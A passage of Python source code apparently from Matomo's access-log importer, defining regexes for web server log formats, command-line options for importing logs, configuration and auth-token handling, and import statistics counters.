self.regex = re.compile(full_regex)
def check_for_iis_option(self):
if not config.options.w3c_time_taken_in_millisecs and self._is_time_taken_milli() and self._is_iis():
logging.info("WARNING: IIS log file being parsed without --w3c-time-taken-milli option. IIS"
" stores millisecond values in the time-taken field. If your logfile does this, the aforementioned"
" option must be used in order to get accurate generation times.")
def _is_iis(self):
return len([line for line in self.header_lines if 'internet information services' in line.lower() or 'iis' in line.lower()]) > 0
def _is_time_taken_milli(self):
return 'generation_time_milli' not in self.regex.pattern
class IisFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'time-taken': '(?P<generation_time_milli>[.\d]+)',
'sc-win32-status': '(?P<__win32_status>\S+)' # this group is useless for log importing, but capturing it
# will ensure we always select IIS for the format instead of
# W3C logs when detecting the format. This way there will be
# less accidental importing of IIS logs w/o --w3c-time-taken-milli.
})
def __init__(self):
super(IisFormat, self).__init__()
self.name = 'iis'
class ShoutcastFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'c-status': '(?P<status>\d+)',
'x-duration': '(?P<generation_time_secs>[.\d]+)'
})
def __init__(self):
super(ShoutcastFormat, self).__init__()
self.name = 'shoutcast'
def get(self, key):
if key == 'user_agent':
user_agent = super(ShoutcastFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(ShoutcastFormat, self).get(key)
class AmazonCloudFrontFormat(W3cExtendedFormat):
fields = W3cExtendedFormat.fields.copy()
fields.update({
'x-event': '(?P<event_action>\S+)',
'x-sname': '(?P<event_name>\S+)',
'cs-uri-stem': '(?:rtmp:/)?(?P<path>/\S*)',
'c-user-agent': '(?P<user_agent>".*?"|\S+)',
# following are present to match cloudfront instead of W3C when we know it's cloudfront
'x-edge-location': '(?P<x_edge_location>".*?"|\S+)',
'x-edge-result-type': '(?P<x_edge_result_type>".*?"|\S+)',
'x-edge-request-id': '(?P<x_edge_request_id>".*?"|\S+)',
'x-host-header': '(?P<x_host_header>".*?"|\S+)'
})
def __init__(self):
super(AmazonCloudFrontFormat, self).__init__()
self.name = 'amazon_cloudfront'
def get(self, key):
if key == 'event_category' and 'event_category' not in self.matched:
return 'cloudfront_rtmp'
elif key == 'status' and 'status' not in self.matched:
return '200'
elif key == 'user_agent':
user_agent = super(AmazonCloudFrontFormat, self).get(key)
return urllib2.unquote(user_agent)
else:
return super(AmazonCloudFrontFormat, self).get(key)
_HOST_PREFIX = '(?P<host>[\w\-\.]*)(?::\d+)?\s+'
_COMMON_LOG_FORMAT = (
'(?P<ip>[\w*.:-]+)\s+\S+\s+(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+(?P<length>\S+)'
)
_NCSA_EXTENDED_LOG_FORMAT = (_COMMON_LOG_FORMAT +
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_S3_LOG_FORMAT = (
'\S+\s+(?P<host>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+(?P<ip>[\w*.:-]+)\s+'
'(?P<userid>\S+)\s+\S+\s+\S+\s+\S+\s+"(?P<method>\S+)\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\d+)\s+\S+\s+(?P<length>\S+)\s+'
'\S+\s+\S+\s+\S+\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
_ICECAST2_LOG_FORMAT = ( _NCSA_EXTENDED_LOG_FORMAT +
'\s+(?P<session_time>[0-9-]+)'
)
_ELB_LOG_FORMAT = (
'(?P<date>[0-9-]+T[0-9:]+)\.\S+\s+\S+\s+(?P<ip>[\w*.:-]+):\d+\s+\S+:\d+\s+\S+\s+(?P<generation_time_secs>\S+)\s+\S+\s+'
'(?P<status>\d+)\s+\S+\s+\S+\s+(?P<length>\S+)\s+'
'"\S+\s+\w+:\/\/(?P<host>[\w\-\.]*):\d+(?P<path>\/\S*)\s+[^"]+"\s+"(?P<user_agent>[^"]+)"\s+\S+\s+\S+'
)
_OVH_FORMAT = (
'(?P<ip>\S+)\s+' + _HOST_PREFIX + '(?P<userid>\S+)\s+\[(?P<date>.*?)\s+(?P<timezone>.*?)\]\s+'
'"\S+\s+(?P<path>.*?)\s+\S+"\s+(?P<status>\S+)\s+(?P<length>\S+)'
'\s+"(?P<referrer>.*?)"\s+"(?P<user_agent>.*?)"'
)
FORMATS = {
'common': RegexFormat('common', _COMMON_LOG_FORMAT),
'common_vhost': RegexFormat('common_vhost', _HOST_PREFIX + _COMMON_LOG_FORMAT),
'ncsa_extended': RegexFormat('ncsa_extended', _NCSA_EXTENDED_LOG_FORMAT),
'common_complete': RegexFormat('common_complete', _HOST_PREFIX + _NCSA_EXTENDED_LOG_FORMAT),
'w3c_extended': W3cExtendedFormat(),
'amazon_cloudfront': AmazonCloudFrontFormat(),
'iis': IisFormat(),
'shoutcast': ShoutcastFormat(),
's3': RegexFormat('s3', _S3_LOG_FORMAT),
'icecast2': RegexFormat('icecast2', _ICECAST2_LOG_FORMAT),
'elb': RegexFormat('elb', _ELB_LOG_FORMAT, '%Y-%m-%dT%H:%M:%S'),
'nginx_json': JsonFormat('nginx_json'),
'ovh': RegexFormat('ovh', _OVH_FORMAT)
}
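# Illustration (not part of the importer): the 'ncsa_extended' regex above maps
# a typical Apache "combined" access log line to named groups roughly as:
#
#   1.2.3.4 - frank [10/Oct/2000:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326 "http://example.com/" "Mozilla/4.08"
#
#   ip=1.2.3.4, userid=frank, date=10/Oct/2000:13:55:36, timezone=-0700,
#   method=GET, path=/index.html, status=200, length=2326,
#   referrer=http://example.com/, user_agent=Mozilla/4.08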
##
## Code.
##
class Configuration(object):
"""
Stores all the configuration options by reading sys.argv and parsing,
if needed, the config.inc.php.
It has 2 attributes: options and filenames.
"""
class Error(Exception):
pass
def _create_parser(self):
"""
Initialize and return the OptionParser instance.
"""
option_parser = optparse.OptionParser(
usage='Usage: %prog [options] log_file [ log_file [...] ]',
description="Import HTTP access logs to Matomo. "
"log_file is the path to a server access log file (uncompressed, .gz, .bz2, or specify - to read from stdin). "
" You may also import many log files at once (for example set log_file to *.log or *.log.gz)."
" By default, the script will try to produce clean reports and will exclude bots, static files, discard http error and redirects, etc. This is customizable, see below.",
epilog="About Matomo Server Log Analytics: https://matomo.org/log-analytics/ "
" Found a bug? Please create a ticket in https://dev.matomo.org/ "
" Please send your suggestions or successful user story to hello@matomo.org "
)
# Basic auth user
option_parser.add_option(
'--auth-user', dest='auth_user',
help="Basic auth user",
)
# Basic auth password
option_parser.add_option(
'--auth-password', dest='auth_password',
help="Basic auth password",
)
option_parser.add_option(
'--debug', '-d', dest='debug', action='count', default=0,
help="Enable debug output (specify multiple times for more verbose)",
)
option_parser.add_option(
'--debug-tracker', dest='debug_tracker', action='store_true', default=False,
help="Appends &debug=1 to tracker requests and prints out the result so the tracker can be debugged. If "
"using the log importer results in errors with the tracker or improperly recorded visits, this option can "
"be used to find out what the tracker is doing wrong. To see debug tracker output, you must also set the "
"[Tracker] debug_on_demand INI config to 1 in your Matomo's config.ini.php file."
)
option_parser.add_option(
'--debug-request-limit', dest='debug_request_limit', type='int', default=None,
help="Debug option that will exit after N requests are parsed. Can be used w/ --debug-tracker to limit the "
"output of a large log file."
)
option_parser.add_option(
'--url', dest='matomo_url',
help="REQUIRED Your Matomo server URL, eg. http://example.com/matomo/ or http://analytics.example.net",
)
option_parser.add_option(
'--api-url', dest='matomo_api_url',
help="This URL will be used to send API requests (use it if your tracker URL differs from UI/API url), "
"eg. http://other-example.com/matomo/ or http://analytics-api.example.net",
)
option_parser.add_option(
'--dry-run', dest='dry_run',
action='store_true', default=False,
help="Perform a trial run with no tracking data being inserted into Matomo",
)
option_parser.add_option(
'--show-progress', dest='show_progress',
action='store_true', default=os.isatty(sys.stdout.fileno()),
help="Print a progress report X seconds (default: 1, use --show-progress-delay to override)"
)
option_parser.add_option(
'--show-progress-delay', dest='show_progress_delay',
type='int', default=1,
help="Change the default progress delay"
)
option_parser.add_option(
'--add-sites-new-hosts', dest='add_sites_new_hosts',
action='store_true', default=False,
help="When a hostname is found in the log file, but not matched to any website "
"in Matomo, automatically create a new website in Matomo with this hostname to "
"import the logs"
)
option_parser.add_option(
'--idsite', dest='site_id',
help= ("When specified, "
"data in the specified log files will be tracked for this Matomo site ID."
" The script will not auto-detect the website based on the log line hostname (new websites will not be automatically created).")
)
option_parser.add_option(
'--idsite-fallback', dest='site_id_fallback',
help="Default Matomo site ID to use if the hostname doesn't match any "
"known Website's URL. New websites will not be automatically created. "
" Used only if --add-sites-new-hosts or --idsite are not set",
)
default_config = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../config/config.ini.php'),
)
option_parser.add_option(
'--config', dest='config_file', default=default_config,
help=(
"This is only used when --login and --password is not used. "
"Matomo will read the configuration file (default: %default) to "
"fetch the Super User token_auth from the config file. "
)
)
option_parser.add_option(
'--login', dest='login',
help="You can manually specify the Matomo Super User login"
)
option_parser.add_option(
'--password', dest='password',
help="You can manually specify the Matomo Super User password"
)
option_parser.add_option(
'--token-auth', dest='matomo_token_auth',
help="Matomo user token_auth, the token_auth is found in Matomo > Settings > API. "
"You must use a token_auth that has at least 'admin' or 'super user' permission. "
"If you use a token_auth for a non admin user, your users' IP addresses will not be tracked properly. "
)
option_parser.add_option(
'--hostname', dest='hostnames', action='append', default=[],
help="Accepted hostname (requests with other hostnames will be excluded). "
" You may use the star character * "
" Example: --hostname=*domain.com"
" Can be specified multiple times"
)
option_parser.add_option(
'--exclude-path', dest='excluded_paths', action='append', default=[],
help="Any URL path matching this exclude-path will not be imported in Matomo. "
" You must use the star character *. "
" Example: --exclude-path=*/admin/*"
" Can be specified multiple times. "
)
option_parser.add_option(
'--exclude-path-from', dest='exclude_path_from',
help="Each line from this file is a path to exclude. Each path must contain the character * to match a string. (see: --exclude-path)"
)
option_parser.add_option(
'--include-path', dest='included_paths', action='append', default=[],
help="Paths to include. Can be specified multiple times. If not specified, all paths are included."
)
option_parser.add_option(
'--include-path-from', dest='include_path_from',
help="Each line from this file is a path to include"
)
option_parser.add_option(
'--useragent-exclude', dest='excluded_useragents',
action='append', default=[],
help="User agents to exclude (in addition to the standard excluded "
"user agents). Can be specified multiple times",
)
option_parser.add_option(
'--enable-static', dest='enable_static',
action='store_true', default=False,
help="Track static files (images, css, js, ico, ttf, etc.)"
)
option_parser.add_option(
'--enable-bots', dest='enable_bots',
action='store_true', default=False,
help="Track bots. All bot visits will have a Custom Variable set with name='Bot' and value='$Bot_user_agent_here$'"
)
option_parser.add_option(
'--enable-http-errors', dest='enable_http_errors',
action='store_true', default=False,
help="Track HTTP errors (status code 4xx or 5xx)"
)
option_parser.add_option(
'--enable-http-redirects', dest='enable_http_redirects',
action='store_true', default=False,
help="Track HTTP redirects (status code 3xx except 304)"
)
option_parser.add_option(
'--enable-reverse-dns', dest='reverse_dns',
action='store_true', default=False,
help="Enable reverse DNS, used to generate the 'Providers' report in Matomo. "
"Disabled by default, as it impacts performance"
)
option_parser.add_option(
'--strip-query-string', dest='strip_query_string',
action='store_true', default=False,
help="Strip the query string from the URL"
)
option_parser.add_option(
'--query-string-delimiter', dest='query_string_delimiter', default='?',
help="The query string delimiter (default: %default)"
)
option_parser.add_option(
'--log-format-name', dest='log_format_name', default=None,
help=("Access log format to detect (supported are: %s). "
"When not specified, the log format will be autodetected by trying all supported log formats."
% ', '.join(sorted(FORMATS.iterkeys())))
)
available_regex_groups = ['date', 'path', 'query_string', 'ip', 'user_agent', 'referrer', 'status',
'length', 'host', 'userid', 'generation_time_milli', 'event_action',
'event_name', 'timezone', 'session_time']
option_parser.add_option(
'--log-format-regex', dest='log_format_regex', default=None,
help="Regular expression used to parse log entries. Regexes must contain named groups for different log fields. "
"Recognized fields include: %s. For an example of a supported Regex, see the source code of this file. "
"Overrides --log-format-name." % (', '.join(available_regex_groups))
)
option_parser.add_option(
'--log-date-format', dest='log_date_format', default=None,
help="Format string used to parse dates. You can specify any format that can also be specified to "
"the strptime python function."
)
option_parser.add_option(
'--log-hostname', dest='log_hostname', default=None,
help="Force this hostname for a log format that doesn't include it. All hits "
"will seem to come to this host"
)
option_parser.add_option(
'--skip', dest='skip', default=0, type='int',
help="Skip the n first lines to start parsing/importing data at a given line for the specified log file",
)
option_parser.add_option(
'--recorders', dest='recorders', default=1, type='int',
help="Number of simultaneous recorders (default: %default). "
"It should be set to the number of CPU cores in your server. "
"You can also experiment with higher values which may increase performance until a certain point",
)
option_parser.add_option(
'--recorder-max-payload-size', dest='recorder_max_payload_size', default=200, type='int',
help="Maximum number of log entries to record in one tracking request (default: %default). "
)
option_parser.add_option(
'--replay-tracking', dest='replay_tracking',
action='store_true', default=False,
help="Replay piwik.php requests found in custom logs (only piwik.php requests expected). \nSee https://matomo.org/faq/how-to/faq_17033/"
)
option_parser.add_option(
'--replay-tracking-expected-tracker-file', dest='replay_tracking_expected_tracker_file', default='piwik.php',
help="The expected suffix for tracking request paths. Only logs whose paths end with this will be imported. Defaults "
"to 'piwik.php' so only requests to the piwik.php file will be imported."
)
option_parser.add_option(
'--output', dest='output',
help="Redirect output (stdout and stderr) to the specified file"
)
option_parser.add_option(
'--encoding', dest='encoding', default='utf8',
help="Log files encoding (default: %default)"
)
option_parser.add_option(
'--disable-bulk-tracking', dest='use_bulk_tracking',
default=True, action='store_false',
help="Disables use of bulk tracking so recorders record one hit at a time."
)
option_parser.add_option(
'--debug-force-one-hit-every-Ns', dest='force_one_action_interval', default=False, type='float',
help="Debug option that will force each recorder to record one hit every N secs."
)
option_parser.add_option(
'--force-lowercase-path', dest='force_lowercase_path', default=False, action='store_true',
help="Make URL path lowercase so paths with the same letters but different cases are "
"treated the same."
)
option_parser.add_option(
'--enable-testmode', dest='enable_testmode', default=False, action='store_true',
help="If set, it will try to get the token_auth from the matomo_tests directory"
)
option_parser.add_option(
'--download-extensions', dest='download_extensions', default=None,
help="By default Matomo tracks as Downloads the most popular file extensions. If you set this parameter (format: pdf,doc,...) then files with an extension found in the list will be imported as Downloads, other file extensions downloads will be skipped."
)
option_parser.add_option(
'--add-download-extensions', dest='extra_download_extensions', default=None,
help="Add extensions that should be treated as downloads. See --download-extensions for more info."
)
option_parser.add_option(
'--w3c-map-field', action='callback', callback=functools.partial(self._set_option_map, 'custom_w3c_fields'), type='string',
help="Map a custom log entry field in your W3C log to a default one. Use this option to load custom log "
"files that use the W3C extended log format such as those from the Advanced Logging W3C module. Used "
"as, eg, --w3c-map-field my-date=date. Recognized default fields include: %s\n\n"
"Formats that extend the W3C extended log format (like the cloudfront RTMP log format) may define more "
"fields that can be mapped."
% (', '.join(W3cExtendedFormat.fields.keys()))
)
option_parser.add_option(
'--w3c-time-taken-millisecs', action='store_true', default=False, dest='w3c_time_taken_in_millisecs',
help="If set, interprets the time-taken W3C log field as a number of milliseconds. This must be set for importing"
" IIS logs."
)
option_parser.add_option(
'--w3c-fields', dest='w3c_fields', default=None,
help="Specify the '#Fields:' line for a log file in the W3C Extended log file format. Use this option if "
"your log file doesn't contain the '#Fields:' line which is required for parsing. This option must be used "
"in conjuction with --log-format-name=w3c_extended.\n"
"Example: --w3c-fields='#Fields: date time c-ip ...'"
)
option_parser.add_option(
'--w3c-field-regex', action='callback', callback=functools.partial(self._set_option_map, 'w3c_field_regexes'), type='string',
help="Specify a regex for a field in your W3C extended log file. You can use this option to parse fields the "
"importer does not natively recognize and then use one of the --regex-group-to-XXX-cvar options to track "
"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Matomo configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Matomo's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Matomo's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--track-http-method', dest='track_http_method', default=False,
help="Enables tracking of http method as custom page variable if method group is available in log format."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=MATOMO_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=MATOMO_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Matomo."
)
option_parser.add_option(
'--include-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'include_host'),
help="Only import logs from the specified host(s)."
)
option_parser.add_option(
'--exclude-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'exclude_host'),
help="Only import logs that are not from the specified host(s)."
)
option_parser.add_option(
'--exclude-older-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_older_than'),
help="Ignore logs older than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--exclude-newer-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_newer_than'),
help="Ignore logs newer than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--add-to-date', dest='seconds_to_add_to_date', default=0, type='int',
help="A number of seconds to add to each date value in the log file."
)
option_parser.add_option(
'--request-suffix', dest='request_suffix', default=None, type='string', help="Extra parameters to append to tracker and API requests."
)
option_parser.add_option(
'--accept-invalid-ssl-certificate',
dest='accept_invalid_ssl_certificate', action='store_true',
default=False,
help="Do not verify the SSL / TLS certificate when contacting the Matomo server. This is the default when running on Python 2.7.8 or older."
)
return option_parser
def _set_date(self, option_attr_name, option, opt_str, value, parser):
try:
(date_str, timezone) = value.rsplit(' ', 1)
except:
fatal_error("Invalid date value '%s'." % value)
if not re.match('[-+][0-9]{4}', timezone):
fatal_error("Invalid date value '%s': expected valid timzeone like +0100 or -1200, got '%s'" % (value, timezone))
timezone = float(timezone)
date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')
date -= datetime.timedelta(hours=timezone/100)
setattr(parser.values, option_attr_name, date)
def _add_to_array(self, option_attr_name, option, opt_str, value, parser):
if not hasattr(parser.values, option_attr_name) or not getattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, [])
getattr(parser.values, option_attr_name).append(value)
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
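# For example (hypothetical invocation), passing "--w3c-map-field my-date=date"
# leaves parser.values.custom_w3c_fields == {'my-date': 'date'}, which
# W3cExtendedFormat.create_regex later uses to rename the expected field.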
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in type(self.format).fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%s' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.matomo_url:
fatal_error('no URL given for Matomo')
if not (self.options.matomo_url.startswith('http://') or self.options.matomo_url.startswith('https://')):
self.options.matomo_url = 'http://' + self.options.matomo_url
logging.debug('Matomo Tracker API URL is: %s', self.options.matomo_url)
if not self.options.matomo_api_url:
self.options.matomo_api_url = self.options.matomo_url
if not (self.options.matomo_api_url.startswith('http://') or self.options.matomo_api_url.startswith('https://')):
self.options.matomo_api_url = 'http://' + self.options.matomo_api_url
logging.debug('Matomo Analytics API URL is: %s', self.options.matomo_api_url)
if self.options.recorders < 1:
self.options.recorders = 1
download_extensions = DOWNLOAD_EXTENSIONS
if self.options.download_extensions:
download_extensions = set(self.options.download_extensions.split(','))
if self.options.extra_download_extensions:
download_extensions.update(self.options.extra_download_extensions.split(','))
self.options.download_extensions = download_extensions
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Matomo.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
matomo_login = self.options.login
matomo_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', matomo_login, matomo_password)
try:
api_result = matomo.call_api('UsersManager.getTokenAuth',
userLogin=matomo_login,
md5Password=matomo_password,
_token_auth='',
_url=self.options.matomo_api_url,
)
except urllib2.URLError as e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable by the user running this script to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.matomo_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
# logging.debug(command);
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
def init_token_auth(self):
if not self.options.matomo_token_auth:
try:
self.options.matomo_token_auth = self._get_token_auth()
except Matomo.Error as e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.matomo_token_auth)
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Plain integer increments are not atomic, so a simple int cannot be used as a shared counter by multithreaded programs. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
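# A minimal usage sketch (not part of the importer): each increment() pulls the
# next value from itertools.count, so concurrent threads never observe a skipped
# or duplicated value.
#   c = Statistics.Counter()
#   c.increment(); c.increment()
#   str(c)  # -> '2'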
def __init__(self):
self.time_start = None
self.time_stop = None
self.matomo_sites = set() # sites ID
self.matomo_sites_created = [] # (hostname, site ID)
self.matomo_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# requests that the Matomo tracker considered invalid (or failed to track)
self.invalid_lines = []
# Do not match the regexp.
self.count_lines_invalid = self.Counter()
# Were filtered out.
self.count_lines_filtered = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP errors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
def print_summary(self):
invalid_lines_summary = ''
if self.invalid_lines:
invalid_lines_summary = '''Invalid log lines
-----------------
The following lines were not tracked by Matomo, either due to a malformed tracker request or an error in the tracker:
%s
''' % textwrap.fill(", ".join(self.invalid_lines), 80)
print('''
%(invalid_lines)sLogs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_filtered)d filtered log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
